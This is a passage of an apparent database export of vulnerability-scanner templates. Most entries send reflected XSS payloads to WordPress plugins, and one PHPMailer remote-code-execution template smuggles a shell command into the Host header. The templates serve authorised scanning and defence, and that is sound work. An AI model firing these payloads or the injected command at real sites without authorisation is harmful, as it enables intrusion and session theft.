and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser.\n remediation: |\n Update to the latest version of the WordPress New Year Firework plugin (1.1.9) to mitigate this vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=453\n - https://wordpress.org/plugins/new-year-firework\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000140\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000140\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45851\n cpe: cpe:2.3:a:new-year-firework_project:new-year-firework:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: new-year-firework_project\n product: new-year-firework\n framework: wordpress\n tags: cve2016,cve,wordpress,xss,wp-plugin,new-year-firework_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/new-year-firework/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'New Year Firework ='\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220522b8d1268fc27200f3edb6ad9277377dbf2941cf980dce8e440fb4520257a7c0220650d2c599689ac4226a6d3839440c8d4991a99d77b01e3b77f968df17206624d:922c64590222798bb761d5b6d8e72950", "hash": "172c62f7aa961d63f96a939116326700", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f82" }, "name": "CVE-2016-1000141.yaml", "content": "id: CVE-2016-1000141\n\ninfo:\n name: WordPress Page Layout builder v1.9.3 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Upgrade to version 2.0 or higher.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=358\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000141\n - https://wordpress.org/plugins/page-layout-builder\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000141\n cwe-id: CWE-79\n epss-score: 0.00142\n epss-percentile: 0.48963\n cpe: cpe:2.3:a:page-layout-builder_project:page-layout-builder:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: page-layout-builder_project\n product: page-layout-builder\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/page-layout-builder\"\n tags: cve,cve2016,wordpress,xss,wp-plugin,page-layout-builder_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/page-layout-builder/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Page Layout Builder ='\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402207b38e136a9969ec1f99831e2c7263ca370a24726ca3e1456694b26bb08f2409a022071798757cb48c00cf6d507e23b12a5e1043e8a2142eac179e3c60b0ae9e862a9:922c64590222798bb761d5b6d8e72950", "hash": "40d7f2be3814fadd0dfede62733a375f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f83" }, "name": "CVE-2016-1000142.yaml", "content": "id: CVE-2016-1000142\n\ninfo:\n name: WordPress MW Font Changer <=4.2.5 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress MW Font Changer plugin 4.2.5 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Allows remote attackers to execute arbitrary script or HTML code in the context of the affected site, potentially leading to session hijacking, defacement, or data theft.\n remediation: |\n Update to the latest version of the WordPress MW Font Changer plugin (4.2.5) or remove the plugin if it is not necessary.\n reference:\n - https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=435\n - https://wordpress.org/plugins/parsi-font\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000142\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000142\n cwe-id: CWE-79\n epss-score: 0.00103\n epss-percentile: 0.40793\n cpe: cpe:2.3:a:parsi-font_project:parsi-font:4.2.5:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: parsi-font_project\n product: parsi-font\n framework: wordpress\n tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,parsi-font_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/parsi-font/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'WP-Parsi Admin Font Editor'\n - 'MW Font Changer'\n condition: or\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220034124fd53f359794e6e238c8b5b1ab2197fdc51283ea8dd11cf6ddd8fa4df6e02203120eabbf0438bac3e922f39a39edc6ae6c7f924e34a83e237574aa8a1b653c4:922c64590222798bb761d5b6d8e72950", "hash": "ed26b54a4f1bf932bb0b01d206d54d76", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f84" }, "name": "CVE-2016-1000143.yaml", "content": "id: CVE-2016-1000143\n\ninfo:\n name: WordPress Photoxhibit 2.1.8 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Photoxhibit 2.1.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of WordPress Photoxhibit or apply the official patch provided by the vendor.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=780\n - https://wordpress.org/plugins/photoxhibit\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000143\n cwe-id: CWE-79\n epss-score: 0.00142\n epss-percentile: 0.48963\n cpe: cpe:2.3:a:photoxhibit_project:photoxhibit:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: photoxhibit_project\n product: photoxhibit\n framework: wordpress\n tags: cve2016,cve,wordpress,wp-plugin,xss,photoxhibit_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/photoxhibit/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'PhotoXhibit'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220027603f0d1de2acc97e034855a99ec951e107675f80ebd29fc7bf81a24688123022100aa8edd1f5bb3e9b8565748afd25a344bd0ac85b9f44b7e54af747bedd030e50f:922c64590222798bb761d5b6d8e72950", "hash": "ff12ab7f077a37a89803cb0d155fa8d7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f85" }, "name": "CVE-2016-1000146.yaml", "content": "id: CVE-2016-1000146\n\ninfo:\n name: WordPress Pondol Form to Mail <=1.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Pondol Form to Mail 1.1 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update to the latest version of the Pondol Form to Mail plugin (>=1.2) or apply a patch provided by the vendor to fix the XSS vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=787\n - https://wordpress.org/plugins/pondol-formmail\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000146\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000146\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45775\n cpe: cpe:2.3:a:pondol-formmail_project:pondol-formmail:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: pondol-formmail_project\n product: pondol-formmail\n framework: wordpress\n tags: cve2016,cve,wordpress,xss,wp-plugin,mail,pondol-formmail_project\n\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/plugins/pondol-formmail/'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220756ecce1cb5af708018bfca00a194af5448f9907a107220029c9eb45c5e73eb2022100ac155b8a798d889d77e3646cca606a536d6d35cca973209e5de2af224f31b6c6:922c64590222798bb761d5b6d8e72950", "hash": "3efa6b346960b3ae97e5736b0cb6f30f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f86" }, "name": "CVE-2016-1000148.yaml", "content": "id: CVE-2016-1000148\n\ninfo:\n name: WordPress S3 Video <=0.983 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress S3 Video and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.\n remediation: |\n Update to the latest version of WordPress S3 Video plugin (>=0.984) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54\n - https://wordpress.org/plugins/s3-video\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=240\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000148\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000148\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.4505\n cpe: cpe:2.3:a:s3-video_project:s3-video:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: s3-video_project\n product: s3-video\n framework: wordpress\n tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,s3-video_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/s3-video/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'S3 Video Plugin ='\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '<\"'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100af55ea8a75b6507ffcd4de783bab308e5528311e23b88402b155f7aae52edf1402204a26ad1fb718e585ab042d394312047068437b70d56e60201ba94d88d9008ec5:922c64590222798bb761d5b6d8e72950", "hash": "2e8df1037e370e9bea3af9fbcf7b9e0d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f87" }, "name": "CVE-2016-1000149.yaml", "content": "id: CVE-2016-1000149\n\ninfo:\n name: WordPress Simpel Reserveren <=3.5.2 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress plugin Simpel Reserveren 3.5.2 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Upgrade to the latest version of the WordPress Simpel Reserveren plugin (>=3.5.3) or apply a patch provided by the vendor to fix the XSS vulnerability.\n reference:\n - https://wordpress.org/plugins/simpel-reserveren\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=474\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000149\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000149\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.4505\n cpe: cpe:2.3:a:simpel-reserveren_project:simpel-reserveren:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: simpel-reserveren_project\n product: simpel-reserveren\n framework: wordpress\n tags: cve2016,cve,wordpress,xss,wp-plugin,simpel-reserveren_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/simpel-reserveren/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Simpel Reserveren'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d334015dd9ba6694bdd6bdab650cd81364fbff781687d1005f962218ed50097702201592398ce3d811966592a2774ad808225c335516750c7244e8b1b1297a53c079:922c64590222798bb761d5b6d8e72950", "hash": "95e30d40bc2364afdb9feaaf64baf61b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f88" }, "name": "CVE-2016-1000152.yaml", "content": "id: CVE-2016-1000152\n\ninfo:\n name: WordPress Tidio-form <=1.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress tidio-form1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of the Tidio-form plugin (version >1.0) to mitigate the XSS vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=799\n - https://wordpress.org/plugins/tidio-form\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000152\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000152\n cwe-id: CWE-79\n epss-score: 0.00251\n epss-percentile: 0.63018\n cpe: cpe:2.3:a:tidio-form_project:tidio-form:1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: tidio-form_project\n product: tidio-form\n framework: wordpress\n tags: cve2016,cve,wordpress,xss,wp-plugin,tidio-form_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/tidio-form/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Easy Contact Form Builder ='\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220371986730365fa3c1674aa1f56a72baf45ff191c9f1629c48186c33a96c6173802200648d66b4e5d140cd9da1c36b9f739331a5200dc9e9d2e4bf3cc9323dff15fc8:922c64590222798bb761d5b6d8e72950", "hash": "2d52fc4ab6f23e10136a83aff66a1655", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f89" }, "name": "CVE-2016-1000153.yaml", "content": "id: CVE-2016-1000153\n\ninfo:\n name: WordPress Tidio Gallery <=1.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress plugin tidio-gallery v1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress Tidio Gallery plugin (1.1 or higher) to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000153\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=427\n - https://wordpress.org/plugins/tidio-gallery\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000153\n cwe-id: CWE-79\n epss-score: 0.00101\n epss-percentile: 0.40457\n cpe: cpe:2.3:a:tidio-gallery_project:tidio-gallery:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: tidio-gallery_project\n product: tidio-gallery\n framework: wordpress\n tags: cve2016,cve,wordpress,xss,wp-plugin,tidio-gallery_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/tidio-gallery/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Tidio Gallery'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c9693b1bd6fbc22838c78600a4754fab312b29b642040567899c5433eb8bb38c0221009c1e726b0d49c9e43d9cd99d487fa5f07719ed3f3c8437b9b8f5753b3910ce71:922c64590222798bb761d5b6d8e72950", "hash": "c0759fc4d60f57369eadf09f31dab957", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f8a" }, "name": "CVE-2016-1000154.yaml", "content": "id: CVE-2016-1000154\n\ninfo:\n name: WordPress WHIZZ <=1.0.7 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress plugin WHIZZ 1.07 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Update WordPress WHIZZ plugin to the latest version (>=1.0.8) which includes a fix for the XSS vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=112\n - https://wordpress.org/plugins/whizz\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000154\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000154\n cwe-id: CWE-79\n epss-score: 0.00142\n epss-percentile: 0.49844\n cpe: cpe:2.3:a:browserweb:whizz:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: browserweb\n product: whizz\n framework: wordpress\n tags: cve2016,cve,wordpress,xss,wp-plugin,browserweb\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/whizz/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'WHIZZ'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022010b00e1e03da20057e11b9152c3ec9cdd135118a3e22499c4c9cc622d550ce2b0221008caf70e5704962de26782ade15ec49d697a240e0312070326cabc183e25e3137:922c64590222798bb761d5b6d8e72950", "hash": "517cc97b005e45c7663942cde90e614b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f8b" }, "name": "CVE-2016-1000155.yaml", "content": "id: CVE-2016-1000155\n\ninfo:\n name: WordPress WPSOLR <=8.6 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress WPSOLR 8.6 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n remediation: |\n Update to the latest version of WPSOLR plugin (8.7 or higher).\n reference:\n - https://wordpress.org/plugins/wpsolr-search-engine\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=303\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000155\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000155\n cwe-id: CWE-79\n epss-score: 0.00103\n epss-percentile: 0.40793\n cpe: cpe:2.3:a:wpsolr:wpsolr-search-engine:7.6:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: wpsolr\n product: wpsolr-search-engine\n framework: wordpress\n tags: cve2016,cve,wordpress,xss,wp-plugin,wpsolr\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/wpsolr-search-engine/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'WPSOLR Search Engine ='\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b4e31a8e20f62df5ed1fbd6d516cf3aaac3613b05365f1a879d1f172e75a75ac022047808d416888877371ac41b66272a681fb7cfc3d4a34a4d165f6e1671ee51dc8:922c64590222798bb761d5b6d8e72950", "hash": "78a08abc74cae0e213c1299532c04917", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f8c" }, "name": "CVE-2016-10033.yaml", "content": "id: CVE-2016-10033\n\ninfo:\n name: WordPress PHPMailer < 5.2.18 - Remote Code Execution\n author: princechaddha\n severity: critical\n description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property in isMail transport.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected WordPress website.\n remediation: |\n Upgrade PHPMailer to version 5.2.18 or higher to mitigate this vulnerability.\n reference:\n - https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html\n - https://nvd.nist.gov/vuln/detail/CVE-2016-10033\n - https://www.exploit-db.com/exploits/40970/\n - https://www.exploit-db.com/exploits/40968/\n - http://seclists.org/fulldisclosure/2016/Dec/78\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2016-10033\n cwe-id: CWE-88\n epss-score: 0.97129\n epss-percentile: 0.99775\n cpe: cpe:2.3:a:phpmailer_project:phpmailer:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: phpmailer_project\n product: phpmailer\n tags: cve,cve2016,seclists,rce,edb,wordpress,phpmailer_project\n\nhttp:\n - raw:\n - |+\n GET /?author=1 HTTP/1.1\n Host: {{Hostname}}\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n - |+\n POST /wp-login.php?action=lostpassword HTTP/1.1\n Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n wp-submit=Get+New+Password&redirect_to=&user_login={{username}}\n\n unsafe: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - wp-login.php?checkemail=confirm\n\n - type: status\n status:\n - 302\n\n extractors:\n - type: regex\n name: username\n group: 1\n regex:\n - 'Author:(?:[A-Za-z0-9 -\\_=\"]+)?([A-Za-z0-9]+)<\\/span>'\n internal: true\n part: body\n# digest: 490a00463044022033411a2aca61b97b205301cdb8eef8ef57c3467165cbe4c0c9a9c547cb8965e50220406a74e33b928a171ca810378162a6b315449d70e1b8059b12a752a0d61c2229:922c64590222798bb761d5b6d8e72950", "hash": "1a0ba726557b6a134fe3ab16748e11e9", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f8d" }, "name": "CVE-2016-10108.yaml", "content": "id: CVE-2016-10108\n\ninfo:\n name: Western Digital MyCloud NAS - Command Injection\n author: DhiyaneshDk\n severity: critical\n description: |\n Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data loss, and potential compromise of the entire network.\n remediation: |\n Apply the latest firmware update provided by Western Digital to patch the vulnerability and ensure the device is not accessible from the internet.\n reference:\n - https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/\n - https://nvd.nist.gov/vuln/detail/CVE-2016-10108\n - https://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html\n - http://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html\n classification:\n cvss-metrics: 